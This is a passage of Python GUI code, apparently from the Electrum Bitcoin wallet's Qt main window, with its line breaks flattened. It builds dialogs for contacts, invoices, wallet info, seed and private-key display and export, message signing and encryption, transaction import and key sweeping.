create_list_tab(self, l, toolbar=None): w = QWidget() w.searchable_list = l vbox = QVBoxLayout() w.setLayout(vbox) #vbox.setContentsMargins(0, 0, 0, 0) #vbox.setSpacing(0) if toolbar: vbox.addLayout(toolbar) vbox.addWidget(l) return w def create_addresses_tab(self): from .address_list import AddressList self.address_list = l = AddressList(self) toolbar = l.create_toolbar(self.config) toolbar_shown = bool(self.config.get('show_toolbar_addresses', False)) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def create_utxo_tab(self): from .utxo_list import UTXOList self.utxo_list = UTXOList(self) return self.create_list_tab(self.utxo_list) def create_contacts_tab(self): from .contact_list import ContactList self.contact_list = l = ContactList(self) return self.create_list_tab(l) def remove_address(self, addr): if not self.question(_("Do you want to remove {} from your wallet?").format(addr)): return try: self.wallet.delete_address(addr) except UserFacingException as e: self.show_error(str(e)) else: self.need_update.set() # history, addresses, coins self.clear_receive_tab() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not self.question(_("Remove {} from your list of contacts?") .format(" + ".join(labels))): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_onchain_invoice(self, invoice: OnchainInvoice): amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit() d = WindowModalDialog(self, _("Onchain Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) grid.addWidget(QLabel(amount_str), 1, 1) if len(invoice.outputs) == 1: grid.addWidget(QLabel(_("Address") + ':'), 2, 0) grid.addWidget(QLabel(invoice.get_address()), 2, 1) else: outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs)) grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0) grid.addWidget(QLabel(outputs_str), 2, 1) grid.addWidget(QLabel(_("Description") + ':'), 3, 0) grid.addWidget(QLabel(invoice.message), 3, 1) if invoice.exp: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1) if invoice.bip70: pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70)) pr.verify(self.contacts) grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0) grid.addWidget(QLabel(pr.get_requestor()), 5, 1) grid.addWidget(QLabel(_("Signature") + ':'), 6, 0) grid.addWidget(QLabel(pr.get_verify_status()), 6, 1) def do_export(): key = pr.get_id() name = str(key) + '.bip70' fn = getSaveFileName( parent=self, title=_("Save invoice to file"), filename=name, filter="*.bip70", config=self.config, ) if not fn: return with open(fn, 'wb') as f: data = f.write(pr.raw) self.show_message(_('BIP70 invoice saved as {}').format(fn)) exportButton = EnterButton(_('Export'), do_export) buttons = Buttons(exportButton, CloseButton(d)) else: buttons = Buttons(CloseButton(d)) vbox.addLayout(grid) vbox.addLayout(buttons) d.exec_() def show_lightning_invoice(self, invoice: LNInvoice): lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP) d = WindowModalDialog(self, _("Lightning Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0) grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit() grid.addWidget(QLabel(amount_str), 1, 1) grid.addWidget(QLabel(_("Description") + ':'), 2, 0) grid.addWidget(QLabel(invoice.message), 2, 1) grid.addWidget(QLabel(_("Hash") + ':'), 3, 0) payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex()) payhash_e.addCopyButton(self.app) payhash_e.setReadOnly(True) vbox.addWidget(payhash_e) grid.addWidget(payhash_e, 3, 1) if invoice.exp: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1) vbox.addLayout(grid) invoice_e = ShowQRTextEdit(config=self.config) invoice_e.addCopyButton(self.app) invoice_e.setText(invoice.invoice) vbox.addWidget(invoice_e) vbox.addLayout(Buttons(CloseButton(d),)) d.exec_() def create_console_tab(self): from .console import Console self.console = console = Console() return console def update_console(self): console = self.console console.history = self.wallet.db.get("qt-console-history", []) console.history_index = len(console.history) console.updateNamespace({ 'wallet': self.wallet, 'network': self.network, 'plugins': self.gui_object.plugins, 'window': self, 'config': self.config, 'electrum': electrum, 'daemon': self.gui_object.daemon, 'util': util, 'bitcoin': bitcoin, 'lnutil': lnutil, }) c = commands.Commands( config=self.config, daemon=self.gui_object.daemon, network=self.network, callback=lambda: self.console.set_json(True)) methods = {} def mkfunc(f, method): return lambda *args, **kwargs: f(method, args, self.password_dialog, **{**kwargs, 'wallet': self.wallet}) for m in dir(c): if m[0]=='_' or m in ['network','wallet','config','daemon']: continue methods[m] = mkfunc(c._run, m) console.updateNamespace(methods) def create_status_bar(self): sb = QStatusBar() sb.setFixedHeight(35) self.balance_label = QLabel("Loading wallet...") self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse) self.balance_label.setStyleSheet("""QLabel { padding: 0 }""") sb.addWidget(self.balance_label) self.search_box = QLineEdit() self.search_box.textChanged.connect(self.do_search) self.search_box.hide() sb.addPermanentWidget(self.search_box) self.update_check_button = QPushButton("") self.update_check_button.setFlat(True) self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor)) self.update_check_button.setIcon(read_QIcon("update.png")) self.update_check_button.hide() sb.addPermanentWidget(self.update_check_button) self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog) sb.addPermanentWidget(self.password_button) sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog)) self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog) sb.addPermanentWidget(self.seed_button) self.lightning_button = None if self.wallet.has_lightning(): self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog) self.update_lightning_icon() sb.addPermanentWidget(self.lightning_button) self.status_button = None if self.network: self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog) sb.addPermanentWidget(self.status_button) run_hook('create_status_bar', sb) self.setStatusBar(sb) def create_coincontrol_statusbar(self): self.coincontrol_sb = sb = QStatusBar() sb.setSizeGripEnabled(False) #sb.setFixedHeight(3 * char_width_in_lineedit()) sb.setStyleSheet('QStatusBar::item {border: None;} ' + ColorScheme.GREEN.as_stylesheet(True)) self.coincontrol_label = QLabel() self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred) self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse) sb.addWidget(self.coincontrol_label) clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None)) clear_cc_button.setStyleSheet("margin-right: 5px;") sb.addPermanentWidget(clear_cc_button) sb.setVisible(False) return sb def set_coincontrol_msg(self, msg: Optional[str]) -> None: if not msg: self.coincontrol_label.setText("") self.coincontrol_sb.setVisible(False) return self.coincontrol_label.setText(msg) self.coincontrol_sb.setVisible(True) def update_lightning_icon(self): if self.lightning_button is None: return if self.network is None or self.network.channel_db is None: self.lightning_button.setVisible(False) return self.lightning_button.setVisible(True) cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate() # self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}") progress_str = "??%" if progress_percent is not None: progress_str = f"{progress_percent}%" if progress_percent and progress_percent >= 100: self.lightning_button.setMaximumWidth(25) self.lightning_button.setText('') self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced.")) else: self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit()) self.lightning_button.setText(progress_str) self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n" "Payments are more likely to succeed with a more complete graph.")) def update_lock_icon(self): icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png") self.password_button.setIcon(icon) def update_buttons_on_seed(self): self.seed_button.setVisible(self.wallet.has_seed()) self.password_button.setVisible(self.wallet.may_have_password()) def change_password_dialog(self): from electrum.storage import StorageEncryptionVersion if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD: from .password_dialog import ChangePasswordDialogForHW d = ChangePasswordDialogForHW(self, self.wallet) ok, encrypt_file = d.run() if not ok: return try: hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption() except UserCancelled: return except BaseException as e: self.logger.exception('') self.show_error(repr(e)) return old_password = hw_dev_pw if self.wallet.has_password() else None new_password = hw_dev_pw if encrypt_file else None else: from .password_dialog import ChangePasswordDialogForSW d = ChangePasswordDialogForSW(self, self.wallet) ok, old_password, new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file) except InvalidPassword as e: self.show_error(str(e)) return except BaseException: self.logger.exception('Failed to update password') self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(32 * char_width_in_lineedit()) line2 = QLineEdit() line2.setFixedWidth(32 * char_width_in_lineedit()) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def init_lightning_dialog(self): if self.question(_( "Warning: this wallet type does not support channel recovery from seed. " "You will need to backup your wallet everytime you create a new wallet. " "Create lightning keys?")): self.wallet.init_lightning() self.show_message("Lightning keys created. Please restart Electrum") def show_wallet_info(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(800, 100) vbox = QVBoxLayout() wallet_type = self.wallet.db.get('wallet_type', '') if self.wallet.is_watching_only(): wallet_type += ' [{}]'.format(_('watching-only')) seed_available = _('True') if self.wallet.has_seed() else _('False') keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()] grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0) grid.addWidget(QLabel(str(seed_available)), 3, 1) if len(keystore_types) <= 1: grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0) ks_type = str(keystore_types[0]) if keystore_types else _('No keystore') grid.addWidget(QLabel(ks_type), 4, 1) # lightning grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0) from .util import IconLabel if self.wallet.has_lightning(): if self.wallet.lnworker.has_deterministic_node_id(): grid.addWidget(QLabel(_('Enabled')), 5, 1) else: label = IconLabel(text='Enabled, non-recoverable channels') label.setIcon(read_QIcon('nocloud')) grid.addWidget(label, 5, 1) if self.wallet.db.get('seed_type') == 'segwit': msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. " "This means that you must save a backup of your wallet everytime you create a new channel.\n\n" "If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed") else: msg = _("Your channels cannot be recovered from seed. " "This means that you must save a backup of your wallet everytime you create a new channel.\n\n" "If you want to have recoverable channels, you must create a new wallet with an Electrum seed") grid.addWidget(HelpButton(msg), 5, 3) grid.addWidget(QLabel(_('Lightning Node ID:')), 7, 0) # TODO: ButtonsLineEdit should have a addQrButton method nodeid_text = self.wallet.lnworker.node_keypair.pubkey.hex() nodeid_e = ButtonsLineEdit(nodeid_text) qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png" nodeid_e.addButton(qr_icon, lambda: self.show_qrcode(nodeid_text, _("Node ID")), _("Show QR Code")) nodeid_e.addCopyButton(self.app) nodeid_e.setReadOnly(True) nodeid_e.setFont(QFont(MONOSPACE_FONT)) grid.addWidget(nodeid_e, 8, 0, 1, 4) else: if self.wallet.can_have_lightning(): grid.addWidget(QLabel('Not enabled'), 5, 1) button = QPushButton(_("Enable")) button.pressed.connect(self.init_lightning_dialog) grid.addWidget(button, 5, 3) else: grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1) grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2) vbox.addLayout(grid) labels_clayout = None if self.wallet.is_deterministic(): keystores = self.wallet.get_keystores() ks_stack = QStackedWidget() def select_ks(index): ks_stack.setCurrentIndex(index) # only show the combobox in case multiple accounts are available if len(keystores) > 1: def label(idx, ks): if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'): return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}' else: return _("keystore") + f' {idx+1}' labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())] on_click = lambda clayout: select_ks(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click) vbox.addLayout(labels_clayout.layout()) for ks in keystores: ks_w = QWidget() ks_vbox = QVBoxLayout() ks_vbox.setContentsMargins(0, 0, 0, 0) ks_w.setLayout(ks_vbox) mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config) mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) run_hook('show_xpub_button', mpk_text, ks) der_path_hbox = QHBoxLayout() der_path_hbox.setContentsMargins(0, 0, 0, 0) der_path_hbox.addWidget(QLabel(_("Derivation path") + ':')) der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown")) der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse) der_path_hbox.addWidget(der_path_text) der_path_hbox.addStretch() ks_vbox.addWidget(QLabel(_("Master Public Key"))) ks_vbox.addWidget(mpk_text) ks_vbox.addLayout(der_path_hbox) ks_stack.addWidget(ks_w) select_ks(0) vbox.addWidget(ks_stack) vbox.addStretch(1) btn_export_info = run_hook('wallet_info_buttons', self, dialog) btn_close = CloseButton(dialog) btns = Buttons(btn_export_info, btn_close) vbox.addLayout(btns) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) r = self.gui_object.daemon.delete_wallet(wallet_path) self.close() if r: self.show_error(_("Wallet removed: {}").format(basename)) else: self.show_error(_("Wallet file not found: {}").format(basename)) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(repr(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase, config=self.config) d.exec_() def show_qrcode(self, data, title = _("QR code"), parent=None, *, help_text=None, show_copy_text_btn=False): if not data: return d = QRDialog( data=data, parent=parent or self, title=title, help_text=help_text, show_copy_text_btn=show_copy_text_btn, config=self.config, ) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk = self.wallet.export_private_key(address, password) except Exception as e: self.logger.exception('') self.show_message(repr(e)) return xtype = bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk, config=self.config) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = _("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") + '\n\n' + \ _('The operation is undefined. Not just in Electrum, but in general.') @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return if not self.wallet.is_mine(address): self.show_message(_('Address not in wallet.')) return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']: self.show_message(_('Cannot sign messages with this type of address:') + \ ' ' + txin_type + '\n\n' + self.msg_sign) return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): try: signature.setText(base64.b64encode(sig).decode('ascii')) except RuntimeError: # (signature) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = ecc.verify_message_with_address(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 2, 1) signature_e = QTextEdit() signature_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) def setText(text): try: message_e.setText(text.decode('utf-8')) except RuntimeError: # (message_e) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=setText) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: public_key = ecc.ECPubkey(bfh(pubkey_e.text())) except BaseException as e: self.logger.exception('Invalid Public key') self.show_warning(_('Invalid Public key')) return encrypted = public_key.encrypt_message(message) encrypted_e.setText(encrypted.decode('ascii')) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() encrypted_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']: from electrum.transaction import tx_from_any try: return tx_from_any(data) except BaseException as e: self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e)) return def import_channel_backup(self, encrypted: str): if not self.question('Import channel backup?'): return try: self.wallet.lnworker.import_channel_backup(encrypted) except Exception as e: self.show_error("failed to import backup" + '\n' + str(e)) return def read_tx_from_qrcode(self): from electrum import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except UserFacingException as e: self.show_error(e) return except BaseException as e: self.logger.exception('camera error') self.show_error(repr(e)) return if not data: return # if the user scanned a bitcoin URI if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'): self.pay_to_URI(data) return if data.lower().startswith('channel_backup:'): self.import_channel_backup(data) return # else if the user scanned an offline signed tx tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self) -> Optional[Transaction]: fileName = getOpenFileName( parent=self, title=_("Select your transaction file"), filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY, config=self.config, ) if not fileName: return try: with open(fileName, "rb") as f: file_content = f.read() # type: Union[str, bytes] except (ValueError, IOError, os.error) as reason: self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): text = text_dialog( parent=self, title=_('Input raw transaction'), header_layout=_("Transaction:"), ok_label=_("Load transaction"), config=self.config, ) if not text: return tx = self.tx_from_text(text) if tx: self.show_transaction(tx) def do_process_from_text_channel_backup(self): text = text_dialog( parent=self, title=_('Input channel backup'), header_layout=_("Channel Backup:"), ok_label=_("Load backup"), config=self.config, ) if not text: return if text.startswith('channel_backup:'): self.import_channel_backup(text) def do_process_from_file(self): tx = self.read_tx_from_file() if tx: self.show_transaction(tx) def do_process_from_txid(self): from electrum import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() raw_tx = self._fetch_tx_from_network(txid) if not raw_tx: return tx = transaction.Transaction(raw_tx) self.show_transaction(tx) def _fetch_tx_from_network(self, txid: str) -> Optional[str]: if not self.network: self.show_message(_("You are offline.")) return try: raw_tx = self.network.run_from_another_thread( self.network.get_transaction(txid, timeout=10)) except UntrustedServerReturnedError as e: self.logger.info(f"Error getting transaction from network: {repr(e)}") self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui()) return except Exception as e: self.show_message(_("Error getting transaction from network") + ":\n" + repr(e)) return return raw_tx @protected def export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It cannot be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(980, 300) vbox = QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password) private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join(map(lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("Electrum was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(repr(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: os.chmod(fileName, 0o600) if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): def on_import(): self.need_update.set() import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import) def do_export_labels(self): export_meta_gui(self, _('labels'), self.wallet.export_labels) def import_invoices(self): import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update) def export_invoices(self): export_meta_gui(self, _('invoices'), self.wallet.export_invoices) def import_requests(self): import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update) def export_requests(self): export_meta_gui(self, _('requests'), self.wallet.export_requests) def import_contacts(self): import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update) def export_contacts(self): export_meta_gui(self, _('contacts'), self.contacts.export_file) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) hbox_top = QHBoxLayout() hbox_top.addWidget(QLabel(_("Enter private keys:"))) hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) vbox.addLayout(hbox_top) keys_e = ScanQRTextEdit(allow_multi=True, config=self.config) keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(*, raise_on_error=False): text = str(keys_e.toPlainText()) return keystore.get_private_keys(text, raise_on_error=raise_on_error) def on_edit(): valid_privkeys = False try: valid_privkeys = get_pk(raise_on_error=True) is not None except Exception as e: button.setToolTip(f'{_("Error")}: {repr(e)}') else: button.setToolTip('') button.setEnabled(get_address() is not None and valid_privkeys) on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_address) on_address(str(address_e.text())) if not d.exec_(): return # user pressed "sweep" addr = get_address() try: self.wallet.check_address_for_corruption(addr) except InternalAddressCorruption as e: self.show_error(str(e)) raise privkeys = get_pk() def on_success(result): coins, keypairs = result outputs = [PartialTxOutput.from_address_and_value(addr, value='!')] self.warn_if_watching_only() self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs) def on_failure(exc_info): self.on_error(exc_info) msg = _('Preparing sweep transaction...') task = lambda: self.network.run_from_another_thread( sweep_preparations(privkeys, self.network)) WaitingDialog(self, msg, task, on_success, on_failure) def _do_import(self, title, header_layout, func): text = text_dialog( parent=self, title=title, header_layout=header_layout, ok_label=_('Import'), allow_multi=True, config=self.config, ) if not text: return keys = str(text).split() good_inputs, bad_inputs = func(keys) if good_inputs: msg = '\n'.join(good_inputs[:10]) if len(good_inputs) > 10: msg += '\n...' self.show_message(_("The following addresses were added") + f' ({len(good_inputs)}):\n' + msg) if bad_inputs: msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10]) if len(bad_inputs) > 10: msg += '\n...' self.show_error(_("The following inputs could not be imported") + f' ({len(bad_inputs)}):\n' + msg) self.address_list.update() self.history_list.update() def 